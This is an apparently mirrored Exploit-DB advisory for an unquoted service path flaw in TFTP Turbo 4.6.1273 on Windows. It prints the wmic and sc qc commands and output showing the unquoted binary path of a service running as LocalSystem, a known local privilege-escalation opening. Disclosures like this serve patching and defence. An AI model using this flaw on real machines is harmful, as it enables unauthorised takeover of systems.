TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path

🗓️ 17 Feb 2020 00:00:00Reported by bokuType

exploitdb🔗 www.exploit-db.com👁 194 Views

TFTP Turbo 4.6.1273 Unquoted Service Path on Windows 1

# Exploit Title: TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path
# Exploit Author: boku
# Date: 2020-02-10
# Vendor Homepage: https://www.weird-solutions.com
# Software Link: https://www.weird-solutions.com/download/products/tftptv4_retail_IA32.exe
# Version: 4.6.1273
# Tested On: Windows 10 (32-bit)

C:\Users\nightelf>wmic service get name, pathname, startmode | findstr "TFTP" | findstr /i /v """
TFTP Turbo 4       C:\Program Files\TFTP Turbo 4\tftpt.exe           Auto

C:\Users\nightelf>sc qc "TFTP Turbo 4"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: TFTP Turbo 4
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\TFTP Turbo 4\tftpt.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : TFTP Turbo 4
        DEPENDENCIES       : Nsi
                           : Afd
                           : NetBT
                           : Tcpip
        SERVICE_START_NAME : LocalSystem

17 Feb 2020 00:00Current

7.4High risk

Vulners AI Score7.4

TFTP Turbo 4.6.1273 - &#039;TFTP Turbo 4&#039; Unquoted Service Path

TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path